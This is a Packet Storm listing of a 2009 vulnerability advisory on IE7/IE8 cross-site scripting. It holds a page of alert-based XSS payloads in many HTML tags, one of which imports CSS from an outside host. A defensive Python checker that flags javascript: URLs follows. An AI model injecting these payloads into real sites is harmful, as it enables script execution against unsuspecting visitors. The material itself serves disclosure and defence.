Internet Explorer 7/8 Cross Site Scripting

23 Jun 2009 | Reported by 80vul | Type: packetstorm | Source: packetstormsecurity.com

Exploiting IE7/IE8 Cross Site Scripting Vulnerability from 200

Code
`Multiple Exploiting IE8/IE7 XSS Vulnerability  
  
Author: www.80vul.com [Email:5up3rh3i#gmail.com]  
Release Date: 2009/06/22  
References: http://www.80vul.com/ie8/Multiple%20Exploiting%20IE8IE7%20XSS%20Vulnerability.txt  
  
Overview:  
  
Tags (other than <IFRAME>) in IE7/8 are not allowed to run  
"javascript:[jscodz]", but we found that they are allowed to run  
when the page is opened in a new target.  
  
For example, this URL:  
  
http://www.80vul.com/test/ie8-1.htm  
  
ie8-1.htm's codz :  
  
<STYLE>@import 'javascript:alert("xss1")';</STYLE>  
<IMG SRC=javascript:alert('XSS2')>  
<BODY BACKGROUND="javascript:alert('XSS3')">  
<LINK REL="stylesheet" HREF="javascript:alert('XSS4');">  
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');">  
<IFRAME SRC="javascript:alert('XSS6');"></IFRAME>  
<DIV STYLE="background-image: url(javascript:alert('XSS7'))">  
<STYLE>.XSS{background-image:url("javascript:alert('XSS8')");}</STYLE><A  
CLASS=XSS></A>  
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS9')")}</STYLE>  
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param  
name=url value=javascript:alert('XSS10')></OBJECT>  
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>  
<script SRC="javascript:alert('xss11');"></script>  
<video SRC="javascript:alert('xss12');"</video>  
<LAYER SRC="javascript:alert('xss13')"></LAYER>  
<embed src="javascript:alert('xss14')"  
type="application/x-shockwave-flash" allowscriptaccess="always"  
width="0" height="0"></embed>  
<applet src="javascript:alert('xss15')" type=text/html>  
  
When this URL is visited with IE7/8, <IFRAME  
SRC="javascript:alert('XSS6');"></IFRAME> runs, but the others  
do not.  
But the result differs when ie8-1.htm is opened in a new target [for example <a href=  
target="_blank">, <iframe>, window.open in <script> ... etc.], so  
I tested this codz on my localhost:  
  
<a href="http://www.80vul.com/test/ie8-1.htm" target="_blank">go</a>  
[PS: <a href="http://www.80vul.com/test/ie8-1.htm">go</a> does not work]  
  
and of course this codz:  
  
<iframe src="http://www.80vul.com/test/ie8s.htm"></iframe>  
  
and this codz:  
  
<script>window.open("http://www.80vul.com/test/ie8-1.htm");</script>  
  
........[testing].......  
  
So the results are:  
---------------------------------------------------------  
IE  | alert  
---------------------------------------------------------  
ie7 | xss4/xss3/xss2/xss1/xss8/xss/xss11/xss7/xss6/xss9  
---------------------------------------------------------  
ie8 | xss4/xss1/xss11/xss6  
---------------------------------------------------------  
  
Disclosure Timeline:  
  
2009/05/01 - Found this Vulnerability  
2009/06/22 - Public Disclosure  
  
Greeting:  
  
ycosxhack[http://hi.baidu.com/ycosxhack],Not his test,not this Vulnerability.  
  
  
  
--   
hitest  
  
`
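
On the defensive side, the vectors in the test page above can be flagged in submitted markup before it is rendered. The following Python check is an added example, not part of the 80vul advisory; the names `find_script_urls` and `JsUrlFinder` and the sample input are assumptions made for illustration. It goes slightly beyond the advisory by also normalising whitespace and character references inside the URL scheme.

```python
import re
from html.parser import HTMLParser

URL_ATTRS = {"src", "href", "background"}  # URL attributes used by the listed vectors
CSS_URL = re.compile(r"""url\(\s*['"]?([^'")]*)|@import\s*['"]([^'"]*)""", re.I)
META_URL = re.compile(r"url\s*=\s*(.*)", re.I | re.S)

def is_script_url(value):
    # Conservative: drop all spaces/control characters before testing the scheme.
    return re.sub(r"[\x00-\x20]+", "", value or "").lower().startswith("javascript:")

def css_has_script_url(css):
    return any(is_script_url(m.group(1) or m.group(2)) for m in CSS_URL.finditer(css or ""))

class JsUrlFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self._in_style = [], False  # findings: (tag, location) pairs

    def handle_starttag(self, tag, attrs):
        self._in_style = tag == "style"
        for name, value in attrs:
            refresh = META_URL.search(value or "") if tag == "meta" and name == "content" else None
            if (name in URL_ATTRS or (tag == "param" and name == "value")) and is_script_url(value):
                self.findings.append((tag, name))
            elif name == "style" and css_has_script_url(value):
                self.findings.append((tag, "style"))
            elif refresh and is_script_url(refresh.group(1)):
                self.findings.append((tag, "content"))

    def handle_endtag(self, tag):
        self._in_style = False

    def handle_data(self, data):
        if self._in_style and css_has_script_url(data):  # body of a <style> element
            self.findings.append(("style", "css"))

def find_script_urls(html):
    finder = JsUrlFinder()
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample: one benign link plus three vectors quoted in the advisory.
SAMPLE = """<a href="https://example.com/">ok</a>
<IMG SRC=javascript:alert('XSS2')>
<DIV STYLE="background-image: url(javascript:alert('XSS7'))">
<STYLE>@import 'javascript:alert("xss1")';</STYLE>"""
```

`find_script_urls(SAMPLE)` returns one `(tag, location)` pair per flagged vector; an empty list means no `javascript:` URL was found in the places the advisory lists.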

Vulners AI Score: 7.4 (High risk)